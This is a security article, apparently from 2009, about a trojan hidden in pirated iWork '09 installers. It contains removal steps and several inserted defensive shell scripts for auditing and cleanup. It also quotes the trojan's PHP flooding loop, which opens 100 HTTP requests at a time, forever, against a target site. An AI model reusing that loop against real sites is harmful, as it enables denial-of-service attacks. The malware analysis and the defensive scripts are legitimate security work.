Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack

These Are Not the Trojans You're Looking For

Trojan masquerades as pirated iWork. CLIX command file for removing it.


Social engineering is great: tantalise with something for free. Watch them stand in line.

It's one thing to say that you're an idiot for obtaining software from untrusted sources, especially over P2P. But it's another to be in total denial, believing that Macs are 'immune' to malware.

Once you furnish your administrator password, anything goes: the installer is now running as root. Be it Mac OS X, Ubuntu, or any other flavor of *nix.

There's an iWork '09 torrent out there. It has everything. But it also has a surprise: it installs an extra package called iWorkServices.

This is eminently easy to do because iWork uses Apple's Installer.app, and Installer packages can carry scripts that run with whatever privileges the user has just granted. So all the meanie had to do was add an extra package to the bundle. In this case the trojan iWorkServices.pkg.

Although it's perfectly possible - and recommended - to perform a complete inspection of install packages before deciding to accept the software, few people bother.

Those who've been victimised by this prank (more than 20,000 so far) find the following on their systems.

/private/tmp/.iWorkServices
/System/Library/StartupItems/iWorkServices
/usr/bin/iWorkServices

Two of the above locations - /System/Library/StartupItems and /usr/bin - are owned by root and off limits to an ordinary user account. As in 'nobody can get in here'. So how did they get in? Easy.

The fools gave their passwords away.

iWorkServices

The item in /System/Library/StartupItems simply makes sure the item in /usr/bin is running. As root of course. No further authentication is necessary: startup items are run by the system at boot, before any user has logged in, so there is no account to ask and they always run as root.
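To see the mechanism rather than take it on faith, here is an added audit script (not from the page and not Rixstep's CLIX command) that walks a StartupItems directory and reports, for every item, the launcher script it holds and every absolute path that script mentions. A startup item is a directory whose launcher script carries the directory's own name, next to a StartupParameters.plist; SystemStarter runs that script as root at boot. The sample item it builds for the test is constructed here: its launcher name and the /usr/bin path it references are stand-ins, not the trojan's actual contents.

```shell
#!/bin/sh
# Added example: report what each Mac OS X startup item launches.
# Usage on a live system:  sudo sh startup_audit.sh --audit /System/Library/StartupItems
# (also worth running against /Library/StartupItems).

audit_startup_items() {
    dir=$1
    if [ ! -d "$dir" ]; then
        echo "no such directory: $dir" >&2
        return 1
    fi
    for item in "$dir"/*/; do
        [ -d "$item" ] || continue
        name=$(basename "$item")
        script="$item$name"               # launcher must carry the item's name
        if [ ! -f "$script" ]; then
            echo "$name: no launcher script named $name"
            continue
        fi
        if [ ! -f "${item}StartupParameters.plist" ]; then
            echo "$name: missing StartupParameters.plist"
        fi
        # Every absolute path the launcher mentions is something it runs, reads
        # or writes as root. A reference into /usr/bin or /tmp deserves a look.
        refs=$(grep -oE '/[A-Za-z0-9_./-]+' "$script" | sort -u | tr '\n' ' ' || true)
        echo "$name: launcher $script, runs as root at boot; references: $refs"
    done
    return 0
}

# Constructed fixture for the demo/test: one well-formed item whose launcher
# keeps a binary under /usr/bin running (the pattern the article describes),
# and one directory that is not a valid startup item at all.
make_startup_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/ExampleServices" "$d/NoScript"
    printf '#!/bin/sh\n. /etc/rc.common\nStartService() { /usr/bin/exampleservices & }\nRunService "$1"\n' \
        > "$d/ExampleServices/ExampleServices"
    printf '{ Description = "Example"; Provides = ("Example"); }\n' \
        > "$d/ExampleServices/StartupParameters.plist"
    echo "$d"
}

case "${1:-}" in
    --audit) audit_startup_items "${2:-/System/Library/StartupItems}" ;;
    --demo)  fx=$(make_startup_fixture); audit_startup_items "$fx"; rm -rf "$fx" ;;
esac
```

Anything this lists under /System/Library/StartupItems that Apple did not put there, or that references a binary outside /System, is exactly the kind of thing the iWorkServices item was.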

The trojan attempts to connect to a remote server. At that point anything is fair game. Intego claim the infected Apple systems are participating in DDoS attacks. So do others who have substantial proof. See below.

Intego Alert

From 22 January.

Exploit: OSX.Trojan.iServices.A Trojan Horse
Discovered: January 21, 2009
Risk: Serious

Description: Intego has discovered a new Trojan horse, OSX.Trojan.iServices.A, which is currently circulating in copies of Apple's iWork 09 found on BitTorrent trackers and other sites containing links to pirated software. The versions of iWork 09, Apple's productivity suite, are complete and functional, but the installer contains an additional package called iWorkServices.pkg.

When installing iWork 09, the iWorkServices package is installed. The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password (in older versions of Mac OS X, 10.5.1 or earlier, there will be no password request). This software is installed as a startup item (in /System/Library/StartupItems/iWorkServices, a location reserved normally for Apple startup items), where it has read-write-execute permissions for root. The malicious software connects to a remote server over the Internet; this means that a malicious user will be alerted that this Trojan horse is installed on different Macs, and will have the ability to connect to them and perform various actions remotely. The Trojan horse may also download additional components to an infected Mac.

Intego is issuing this alert to warn Mac users not to download iWork 09 installers from sites offering pirated software. (As of 6 am EST, at least 20,000 people have downloaded this installer.) The risk of infection is serious, and users may face extremely serious consequences if their Macs are accessible to malicious users.

Pete Yandell

Pete Yandell down under discovered the trojan almost a week ago.

This morning I found a bunch of these processes chewing 100% CPU on my laptop (OS X 10.5.6):

php -r 'while(1){
  // open 100 simultaneous HTTP requests to the same URL, forever
  $mh = curl_multi_init(); $ch = array();
  for($i = 0; $i < 100; $i++){
    $ch[$i] = curl_init();
    curl_setopt($ch[$i], CURLOPT_URL, "http://...");
    curl_setopt($ch[$i], CURLOPT_HEADER, 0);
    curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
    curl_multi_add_handle($mh, $ch[$i]);
  }
  // drive all 100 transfers to completion, then start over
  do{ curl_multi_exec($mh, $running); }
  while($running > 0);
  for($i = 0; $i < 100; $i++){ curl_multi_remove_handle($mh, $ch[$i]); }
  curl_multi_close($mh);
}'
That's a PHP script, running as root, and DoSing a website. (I've taken out the website URL, but it is one that has recently been under a documented DDoS attack.)

I'm still trying to work out how these got fired up.

He soon found out.

'My copy of the iWork 09 trial installer contained a trojan.'

Yandell got his copy 'through multiple hands'; he knows he was dumb.

AV Doesn't Help - Brains Do

Pete Yandell adds a few cogent remarks a week later.

'The companies that make Mac virus protection software are having fun with this of course but I still don't think virus protection software is needed on a Mac. My trojan didn't get in through an email or a malicious web page; it got in through my stupidity.'

Read that again. This trojan is extremely dangerous. But it's not a security hole in the system. The 20,000+ compromised Apple systems represent 20,000+ fools and no more. Antivirus does not help. Not. One. Bit. Nobody had a signature for this thing when those people typed in their passwords; by the time Intego did, the damage was done.

The MacRumors 'Fix'

MacRumors report that, despite the widespread alert, people are still downloading the trojan.

'Despite significant publicity surrounding this incident today the infected iWork package remains active in the torrent community.'

MacRumors go on to state that the continued threat prompts them to move their report from the 'back page' area of the site to the front page. As if this wasn't major news otherwise.

Following is the MacRumors 'fix' - but don't run it as is: it drops you into a root shell with sudo su and leaves you there, a bad habit even when the commands that follow are harmless.

1) (open Terminal.app)
2) sudo su (enter password)
3) rm -r /System/Library/StartupItems/iWorkServices
4) rm /private/tmp/.iWorkServices
5) rm /usr/bin/iWorkServices
6) rm -r /Library/Receipts/iWorkServices.pkg
7) killall -9 iWorkServices

A far safer way to go about this follows. Note 2) is wrapped for display.

1) (open Terminal.app)
2) sudo rm -fr /Library/Receipts/iWorkServices.pkg /private/tmp/.iWorkServices
/System/Library/StartupItems/iWorkServices /usr/bin/iWorkServices
3) killall -9 iWorkServices

You can also download the CLIX command here - then all you do is double click and run.
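For those who prefer to look before they delete, here is an added script (not the CLIX command above, and not the MacRumors recipe) that first checks a system for the four paths listed earlier and only removes them when told to. Two things it does differently from both recipes: it stops the process before deleting files, and it lists the 'php -r' processes Yandell saw, since killall iWorkServices will not touch those. The PREFIX argument is an assumption for testing: it lets the same code run against a throwaway directory tree instead of the live system, and the infected tree built below is constructed, not a real sample.

```shell
#!/bin/sh
# Added example: check for, and optionally remove, the iWorkServices files.
#   sh iws.sh --check             # report, needs no privileges
#   sudo sh iws.sh --remove       # stop the process, then delete the four paths
IWS_PATHS='/private/tmp/.iWorkServices
/System/Library/StartupItems/iWorkServices
/usr/bin/iWorkServices
/Library/Receipts/iWorkServices.pkg'

iworkservices_check() {
    prefix=${1:-}                     # empty prefix = the live system
    found=0
    for p in $IWS_PATHS; do
        if [ -e "$prefix$p" ]; then
            echo "FOUND   $p"; found=$((found + 1))
        else
            echo "absent  $p"
        fi
    done
    echo "found: $found"
    return 0
}

# Yandell's flooders showed up as 'php -r while(1){...' running as root.
list_php_flooders() {
    ps -A -o pid=,user=,args= 2>/dev/null | grep '[p]hp -r' || true
}

stop_process() {
    # pkill -x matches the exact process name; killall -9 is the page's equivalent
    if command -v pkill >/dev/null 2>&1; then
        pkill -9 -x "$1" 2>/dev/null || true
    else
        killall -9 "$1" 2>/dev/null || true
    fi
}

iworkservices_remove() {
    prefix=${1:-}
    stop_process iWorkServices        # kill first so nothing re-creates the files
    for p in $IWS_PATHS; do
        rm -rf "$prefix$p"
    done
    return 0
}

# Constructed fixture: empty stand-ins at the four paths under a temp root.
make_infected_fixture() {
    d=$(mktemp -d)
    for p in $IWS_PATHS; do
        mkdir -p "$(dirname "$d$p")"
        : > "$d$p"
    done
    echo "$d"
}

case "${1:-}" in
    --check)  iworkservices_check "${2:-}"; list_php_flooders ;;
    --remove) iworkservices_remove "${2:-}" ;;
esac
```

Deleting the four files is housekeeping, not a clean bill of health: the process ran as root and talked to a remote server, so anything else it fetched is not on this list.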

MacRumors Comments

This is always the most fun part. First the platform is impervious to any and all threats. Then everybody in the world is evil - and that includes the messengers who try to get these people to get a clue.

Trojan, not virus.

Ha ha. Serves them right the suckers!

Consider yourself to be highly lucky that you have no idea what a virus actually is.

It just goes to show that even if you have a Mac, just use a little common sense and you'll be fine.

Illegal software carries a trojan? As Justin Trousersnake once sang: 'Cry Me A River'.

********. I dl and installed iWorks, so did 4 people I know, none of us has this freakin' thing installed. Intego is at it again with imaginary threats

Why would anyone dl the torrent when you can get the full version minus serial code from apple?

-1 for the pirates.

**** happens....

Haha. I have no sympathy. It actually kind of made me smile....

Not the same as an actual virus for OS X.

What I don't get is why people just don't download the trial and enter in the serial......

I don't get why people don't pay the lousy $80 for it. I mean it's not expensive as far as software is concerned. Or better yet why they don't just download an open source office suite like open office. I have been using Neo-Office for years now and can't figure why I would need to buy or steal a productivity suite.

Once you put in your admin password during installation almost anything is possible. It could install an executable that would be run by root for example and disable LittleSnitch.

You can download a trial from Apple and find the serial on the web. There's no actual program (as far as I know) that you need to crack the program.

This is why you get the direct download from Apple, and then hunt for a serial... If you're in to the whole stealing copyrighted software thing. This just proves that people are idiots for downloading stuff from torrent sites, my hypothesis is proven.

I bet that half the people saying 'get what they deserve' are currently downloading virus removal software to check their torrent!

I have nothing to worry about :) But just curious, what's a virus, and what is a trojan? (coming from a Mac user, LOL)

And to those who bought pirate copies..... you asked for it...

You know, even when you have a Mac and you think you can beat the world wide web with it because you think you will stay virus free - you still got to be careful. Whoever is downloading the torrent should be pretty dumb.

The Little Snitch 'Fix'

Pete Yandell feels better now. This sort of thing isn't going to happen to him again.

'I am, however, now running Little Snitch, which at least would have let me know a bit earlier that I had a problem. It's a bit intrusive, so I'm not sure if I'll have the patience to keep using it.'

But Little Snitch isn't the solution. Listen to AlphaMack instead.

'Considering that the word on the street is that this trojan installs a backdoor and downloads additional software, who knows what other buggers lurk deep within the rabbit hole once the obvious intruder is gone.'

In other words: because you weren't careful, didn't inspect the package beforehand and didn't track what the installer did, anything can happen. You left your system wide open to the 'guests'. Removing the four known files gets rid of the obvious intruder and nothing more; once a remote party has had root on the box, the only way back to a known state is a clean reinstall from trusted media and new passwords.

The 'Fix'

The 'real' fix is about what you do from here on - or, if you're adventurous, about putting the next package you install to the test right now.

  • Don't pirate software, especially over P2P. Take software only from trusted sources. This deliberately sounds like the Apple mantra of being careful with 'unknown and untrusted' titles.
  • It's not just about trust. It's about knowing even what non-malevolent packages are going to do.
  • If an installer asks for your password then be sure it gives you a good reason. Do not give away your password to strangers.
  • Run checks on the package. Installer packages can be opened with Pacifist. Binaries can be inspected with Xstrings. Installers can be fully tracked with Tracker to see exactly what they're up to.
  • The above should always be performed even with titles you're more inclined to trust. Such precautions take very little time or effort.
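Pacifist, Xstrings and Tracker are the comfortable way. The bare-bones version of 'run checks on the package', as an added example that is not part of the page and not one of those tools, is the script below: it opens a bundle-style Installer package (a .pkg or .mpkg directory, as on Mac OS X 10.5) without running it and reports whether it will demand an admin password (the RootAuthorization flag in its Info.plist), which pre/postflight scripts it will run with that privilege, what its bill of materials says it writes (via lsbom, macOS only), and which sub-packages a metapackage pulls in. Flat xar packages must be unpacked first with pkgutil --expand. The metapackage it builds for the test is constructed: the names Example.mpkg, Main.pkg and Extra.pkg and the postflight script are stand-ins, not the contents of the iWork torrent.

```shell
#!/bin/sh
# Added example: inspect a bundle-style .pkg/.mpkg before installing it.
#   sh pkg_inspect.sh --inspect /Volumes/Foo/Install.mpkg

inspect_pkg() {
    pkg=$1
    echo "== $(basename "$pkg")"
    if [ ! -d "$pkg/Contents" ]; then
        echo "   not a bundle-style package (flat package? pkgutil --expand it first)"
        return 0
    fi
    # IFPkgFlagAuthorizationAction = RootAuthorization is what makes Installer.app
    # ask for an admin password; every script below then runs as root.
    if grep -q 'RootAuthorization' "$pkg/Contents/Info.plist" 2>/dev/null; then
        echo "   asks for admin password: yes (RootAuthorization)"
    else
        echo "   asks for admin password: not set in this package's Info.plist"
    fi
    for s in InstallationCheck VolumeCheck preflight preinstall preupgrade \
             postinstall postupgrade postflight; do
        f="$pkg/Contents/Resources/$s"
        if [ -f "$f" ]; then
            echo "   script: $s ($(wc -l < "$f" | tr -d ' ') lines) - read it before installing"
        fi
    done
    # Archive.bom lists every path the payload will write (lsbom exists on macOS only)
    if [ -f "$pkg/Contents/Archive.bom" ] && command -v lsbom >/dev/null 2>&1; then
        lsbom -s "$pkg/Contents/Archive.bom" | sed 's/^/   writes: /'
    fi
    return 0
}

# A metapackage is a wrapper; the extra package in the iWork torrent was one
# of its sub-packages, so always look at every one of them.
inspect_pkg_tree() {
    inspect_pkg "$1"
    for sub in "$1"/Contents/Packages/*.pkg "$1"/Contents/Installers/*.pkg; do
        if [ -d "$sub" ]; then
            inspect_pkg "$sub"
        fi
    done
    return 0
}

# Constructed fixture: a metapackage that wants root, with one sub-package
# carrying a postflight script that copies a helper into /usr/bin.
make_pkg_fixture() {
    d=$(mktemp -d)
    mk=$d/Example.mpkg
    mkdir -p "$mk/Contents/Packages/Main.pkg/Contents/Resources" \
             "$mk/Contents/Packages/Extra.pkg/Contents/Resources"
    printf '<plist><dict><key>IFPkgFlagAuthorizationAction</key><string>RootAuthorization</string></dict></plist>\n' \
        > "$mk/Contents/Info.plist"
    printf '#!/bin/sh\n# constructed sample postflight: runs as root after the payload lands\ncp "$1/Contents/Resources/helper" /usr/bin/helper\n' \
        > "$mk/Contents/Packages/Extra.pkg/Contents/Resources/postflight"
    echo "$mk"
}

case "${1:-}" in
    --inspect) inspect_pkg_tree "$2" ;;
    --demo)    fx=$(make_pkg_fixture); inspect_pkg_tree "$fx"; rm -rf "$(dirname "$fx")" ;;
esac
```

The point of the script line count is not the number: it is that a one-line postflight copying a file into /usr/bin and a 200-line one are both something you read in full before you type a password.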

Remember: even an IBM supercomputer at Los Alamos can be hacked - if the person with the keys opens the front door wide.

This wasn't an exploit - it was 20,000+ fools getting fooled.

 - AlphaMack & Mac Skywatcher

See Also
Security Fix: Pirated iWork Software Infects Macs with Trojan Horse
Mack Diesel's Musings: These Are Not the Trojans You're Looking For

Copyright © Rixstep. All rights reserved.